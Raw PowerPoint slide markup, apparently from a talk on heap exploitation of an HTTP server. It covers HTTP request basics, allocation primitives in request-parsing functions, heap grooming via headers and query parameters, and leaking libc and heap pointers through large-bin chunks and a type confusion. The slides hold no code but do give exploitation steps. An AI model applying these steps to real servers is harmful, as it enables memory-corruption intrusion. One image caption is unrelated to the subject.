          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fd, Bk, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fd_nextsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bk_nextsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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  <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>TCache/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0" err="1"/>
              <a:t>Fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not viable here… not possible to get multiple chunks of a specific size in a bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Large bin chunk">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE541B55-B8BC-5A4F-A4BE-5A681755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02" y="1079584"/>
            <a:ext cx="1459283" cy="3633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9717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developer.mozilla.org/en-US/docs/Web/HTTP/Overview">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F65CD49-95C3-8040-94AF-14F3D62DE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75"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="501588" y="3584755"/>
            <a:ext cx="5989653" cy="139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6EB65-ACBC-554A-A92C-DB73DFD8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– Line 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A6106-56F7-534D-8073-4A7424D1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Method/Verb:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operation to perform – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>GET, POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path or location of the resource to fetch -	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>file.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Version:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The version of the HTTP protocol to use – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTTP/1.1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96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9014-BDF3-B342-99D2-D7CE9B70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Allocation/Freeing Primitives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5A1E91B-2091-9202-A49C-789DC093ED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787446"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="628650" y="1236541"/>
          <a:ext cx="7709438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509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2BBD-F30A-AB41-9979-E4E79F8D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URI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BABC-6FD0-3C40-80DA-5DFCBA7F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220" y="1236540"/>
            <a:ext cx="4611498" cy="3906959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read_wrapper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Partially controlled size        (0x10, 0x20, 0x40…) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control AMOUNT of allocations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Force lots of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frees()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Query parameters in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parse_uri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Key/Value length is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>allocation size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>by us (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>local_cpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Frees at the END of this call</a:t>
            </a:r>
          </a:p>
          <a:p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url_decode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r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> similar to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read_wrapper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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="18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0x40, 0x80…0x400, 0x800, 0x1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Read Wrapper allocation primitive">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADE3D9C-449B-124F-86D4-B07B3697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801" y="1003300"/>
            <a:ext cx="4370199" cy="19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71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9" y="1236541"/>
            <a:ext cx="6826772" cy="32635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i="1" u="sng" dirty="0"/>
              <a:t>unsorted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bin for pointers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and Heap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Allocate ‘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header_data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-&gt;value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with chunk from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>step 1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/echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the header for leak!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42" name="Picture 6" descr="Madden NFL Mobile Deep Dive: Roster and Playbook Updates">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031EC726-290B-4E4F-8C7E-F9A18B63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904" y="2309247"/>
            <a:ext cx="4115638" cy="232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768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2BBD-F30A-AB41-9979-E4E79F8D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parse_single_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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BABC-6FD0-3C40-80DA-5DFCBA7F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220" y="1236541"/>
            <a:ext cx="4602997" cy="1335209"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Control EXACT size of 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malloc() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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via key length &amp; value length </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="parse_single_header allocations and frees">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8213DFE-E828-1A43-84F4-914AF6E9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7" y="2767946"/>
            <a:ext cx="6362055" cy="22780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65A80F-C3EA-A34F-87C0-3C9A82FCE908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1236540"/>
            <a:ext cx="4602997" cy="1335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Control the approximate size of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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free()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="18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Limited on AMOUNT of free chunks in a bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800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730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6F7E-05E9-C345-B137-DEB37E4C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Half Science – Half Art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E773A8D-A85C-1A42-B5C6-D35B8451D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8785"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3887391" y="740572"/>
            <a:ext cx="4629150" cy="36552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5364" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E881E258-29A2-3B5B-5675-BD0141493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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Play around with it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What can I do to make this work? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2893155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Groom!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9" y="1236541"/>
            <a:ext cx="6826772" cy="32635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i="1" u="sng" dirty="0"/>
              <a:t>unsorted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bin for pointers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and Heap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Allocate ‘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header_data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-&gt;value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with chunk from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>step 1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/echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the header for leak!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42" name="Picture 6" descr="Madden NFL Mobile Deep Dive: Roster and Playbook Updates">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031EC726-290B-4E4F-8C7E-F9A18B63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904" y="2309247"/>
            <a:ext cx="4115638" cy="232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2504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75A08FE-B89C-5F0A-09E0-1176B8349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Thought #1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Value pointer next to top chunk">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D52BF36-2F90-8948-878C-BB67E907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391" y="924184"/>
            <a:ext cx="4629150" cy="3287994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6FF03F-3CBE-A8B3-2F98-A1C1EE9A3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Header_data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-&gt;value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>next to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top_chunk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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31D83D44-7E14-E74A-84C8-3DE1C6EBE7F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="4119963"/>
            <a:ext cx="2112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 descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C27DA30-C10A-DC44-9BAB-0B2B2A4D61F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4786544" y="1617940"/>
            <a:ext cx="2112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473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75A08FE-B89C-5F0A-09E0-1176B8349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C6FF03F-3CBE-A8B3-2F98-A1C1EE9A3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4279510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TCache/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1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Fastbin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Not enough </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng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frees()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Other bins NEXT to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top_chunk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Chunk will consolidate with top chunk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9" name="Picture 8" descr="Generic bin diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E4781B1-B070-3944-B129-E4980E6C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761" y="2778710"/>
            <a:ext cx="1996459" cy="212389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57AAC47-CAA0-3240-BB64-DC18F190ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5469652" y="348449"/>
            <a:ext cx="2949178" cy="12001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177CC0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/>
              <a:t>Solution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B4D8FD6-A0C9-7944-8940-A1899FE28920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4706171" y="1543052"/>
            <a:ext cx="4279510" cy="2858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Unsorted/Small/Large Bin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Alterative: Connection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Allocate &amp; free target chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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early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CA94EC-BC29-1441-A2CD-DF3BBA553EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2522264" y="1695635"/>
            <a:ext cx="218390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4038A6-25FE-FE4E-8B93-2084255844A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4057095" y="2246050"/>
            <a:ext cx="719091" cy="7102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1396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2BBD-F30A-AB41-9979-E4E79F8D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Allocation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BABC-6FD0-3C40-80DA-5DFCBA7F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220" y="1236540"/>
            <a:ext cx="7886700" cy="376158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read_wrapper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Partially controlled size        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x10, 0x20…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>0x1000, 0x2000, 0x4000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query parameters in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parse_uri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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Key/Value length is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>allocation size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>by us (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>local_cpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Frees at the END of this call</a:t>
            </a:r>
          </a:p>
          <a:p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url_decode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r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> similar to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read_wrapper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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800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0x40, 0x80…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" u="sng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0x800, 0x1000, 0x2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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72772-1B23-FF46-8FE6-A76063A9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4" y="4346773"/>
            <a:ext cx="8974892" cy="796727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9220251-C6A7-8048-9818-4D26BA4E156C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4838605"/>
            <a:ext cx="94991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 descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C64C972-6775-5F43-A6DB-16FE71780413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5143500"/>
            <a:ext cx="94991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2719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1E97-2B0F-EF40-AE19-E5C1A32B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URL/Parameters = Groomed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52DA-497E-4549-B6A0-27A19484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656740" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creates HUGE chunks for us to allocate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chunks put into large bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘fd’ points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd_nextsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ points to Heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> leak 🔥</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Large bin chunk">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF43C9D5-5ADA-C447-AC5E-2AF3A6B5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02" y="1079584"/>
            <a:ext cx="1459283" cy="3633112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9E35EFC-0953-0E40-A96F-DF4028B9133C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6868448" y="2715363"/>
            <a:ext cx="18333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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC1A0591-17D2-B942-B026-7FB7288B7AB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6868448" y="3967660"/>
            <a:ext cx="18333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rge chunk allocation">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96BF8929-6A1A-8F4F-8AEA-03DCF770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05" y="3159792"/>
            <a:ext cx="4200229" cy="1898409"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1BCE912-1A37-E64A-92F9-AF82E9E4D968}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1738635" y="4190536"/>
            <a:ext cx="18333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 descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC2CCE04-B15B-0D4A-89C4-45E88E294E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2830588" y="4712696"/>
            <a:ext cx="18333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3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developer.mozilla.org/en-US/docs/Web/HTTP/Overview">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F65CD49-95C3-8040-94AF-14F3D62DE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0" b="11736"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2571750"/>
            <a:ext cx="8237687" cy="19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6EB65-ACBC-554A-A92C-DB73DFD8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–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A6106-56F7-534D-8073-4A7424D1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Conveys additional information to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Type – Type of data being sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: The location to which the request is being made to</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3035013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1E97-2B0F-EF40-AE19-E5C1A32B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Headers = Groomed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52DA-497E-4549-B6A0-27A19484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129781" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add 5+ headers +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Connection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header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds MANY chunks to the smaller TCache bin sizes 🔥</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocate size with more than one chunk in the bin</a:t>
            </a:r>
          </a:p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C546E11-BC28-2842-8AD1-C982842F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089"/>
            <a:ext cx="9148627" cy="1564273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="TCache Chunk">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96618451-F83B-7D4F-BE2C-EC23AFAC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728" y="417925"/>
            <a:ext cx="1859280" cy="3098800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92DA7561-FB3E-4C40-8FAB-3548BCBA12EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
